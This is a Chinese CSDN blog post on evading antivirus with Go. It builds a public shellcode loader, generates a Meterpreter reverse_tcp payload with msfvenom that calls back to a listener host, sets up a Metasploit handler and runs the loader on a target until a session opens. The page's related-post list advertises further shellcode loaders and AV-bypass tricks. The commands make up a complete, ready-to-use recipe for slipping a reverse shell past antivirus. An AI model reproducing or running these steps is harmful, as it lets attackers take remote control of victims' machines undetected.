go免杀技术

最新推荐文章于 2024-04-13 08:43:09 发布
最新推荐文章于 2024-04-13 08:43:09 发布
阅读量593 收藏 2
点赞数
分类专栏: # 免杀技术
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/118859851
版权

文章目录

分离免杀

下载编译加载器

#下载
https://github.com/brimstone/go-shellcode
#进入sc目录,编译,生成一个main.exe
go build main.go

生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.170.129 lport=4444 -f hex -o msf.hex

msf开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.170.129
set lport 4444
exploit

在目标机器上运行

main.exe <shellcode>

在这里插入图片描述
成功上线

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
go免杀初探1
08-03
0x02 免杀测试先成成个. C 件这先贴个最原始的 go 加载代码kernel32 = syscall.MustLoadDLL("kernel32.dll")
Golang守护进程
什么都不会
02-01 261
【代码】Golang守护进程
GoPass系列免杀基础(一)_go语言免杀,2024年最新Golang虚拟机原理深入解析
最新发布
2301_82243440的博客
04-13 768
Shellcode 是可执行的 16 进制机器码,需要执行的话它就需要用到 Shellcode 加载器。Shellcode 加载器的主要功能:开辟内存空间–将 Shellcode 放入内存空间–指针指向 Shellcode 地址执行。以 Goby 的 GoPassPython 插件来说:这个是用 Python 语言作为 Shellcode 的加载器执行 Shellcode 的,它的步骤:开辟空间–写入内存空间–然后执行。可以尝试放入自己的 Shellcode 执行一下。
golang实现守护进程(3)—
dkjhl的博客
05-08 1858
在操作系统中,每个进程都有自己的进程ID(PID),父进程ID(PPID)等信息。如果一个进程已经退出,但它的、它的资源和状态还留在系统中,这种进程被称为“僵尸进程”。僵尸进程不占用CPU时间和内存资源,但它们占用系统的进程表,因此可以说是一种资源泄漏。那么如何正确处理僵尸进程呢,golang语言中的os.exec包自带回收僵尸进程的处理逻辑,我们只要在子进程中添加对应的逻辑即可
golang实现守护进程(1)
dkjhl的博客
03-21 1171
golang实现守护进程,包含功能: 1. 守护进程只创建一次 2. 平滑创建业务进程 3. 业务进程挂起,守护进程能监听,并重启新启业务进程 4. 守护进程退出,也能保证业务进程退出 5. 业务进程≈子进程 6. 不影响业务进程逻辑 7. 以Linux平台为主,其他平台暂时没有实施条件
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
qq_53058639的博客
02-27 392
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式。
免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​
qq_56426046的博客
10-04 1954
GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
远控免杀从入门到实践(7)-代码篇-Golang+Ruby
weixin_46236101的博客
03-13 1202
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实践
Go测试远控免杀学习
paidx0
05-07 1962
Go远控免杀学习
go-packer:golang打包二进制进行免杀
04-07
go-packer golang打包二进制进行免杀
lcx._g go语言写的lcx 过杀软
11-16
lcx._g go语言写的lcx.exe 免杀 过杀软 360
绕过AV:免杀shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
CS-Loader:CS免杀
03-22
暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender)依赖...
32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
Go编写免杀木马
渗透测试
06-28 854
启动main.go -》 加载x1.bin -》加载x2.bin。
golang任意代码免杀绕过火绒+电脑管家
2301_79571829的博客
09-01 957
火绒和电脑管家主要以静态规则为主,但是有时候静态杀起来也挺让人奔溃的,这边分享一下如何拿捏火绒和电脑管家本文主要介绍如何通过garble进行混淆编译来绕过火绒,garble也可以绕过其他杀软,但是对火绒和电脑管家特别有效果,以火绒为例 下面来对比一下golang原生和garble混淆编译后得差距来一个很原始的的shellcode loader代码,将原始shellcode base64后就进行加载执行。
golang实现守护进程(2)
dkjhl的博客
03-21 1064
golang实现守护进程,包含功能: 1. 守护进程只创建一次 2. 平滑创建业务进程 3. 业务进程挂起,守护进程能监听,并重启新启业务进程 4. 守护进程退出,也能保证业务进程退出 5. 业务进程≈子进程 6. 不影响业务进程逻辑 7. 以Linux平台为主,其他平台暂时没有实施条件
一款nim语言的图形化免杀
The current road is different, love needs to distinguish between right and wrong
11-26 3118
简介 使用偏门语言的shellcode加载器处理免杀,一直是很流行的方案,语言也一变在变,从最开始的python免杀,go免杀;到现在的nim语言免杀。nim语言生成的文件还是比较小的,大概400k左右,部分场景可以利用bitsadmin、certutil等落地执行。 目前加载器方法可以静态过某数字,但执行beacon还是会掉线,有待进一步优化。 环境搭建 需要下载nim语言环境: Download - Nim Programming Language 提供了windows版本和un
编写一段段go语言免杀
09-18
我们可以使用Go语言来编写免杀代码。主要有以下几点:1)使用Go语言提供的抽象类型和函数;2)在编译时使用Go语言提供的编译器参数;3)使用Go语言的模块,如标准库中的syscall模块;4)使用Go语言的类型安全特性,例如枚举类型和结构体;5)使用Go语言的内存安全特性,例如检查堆栈溢出和内存溢出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值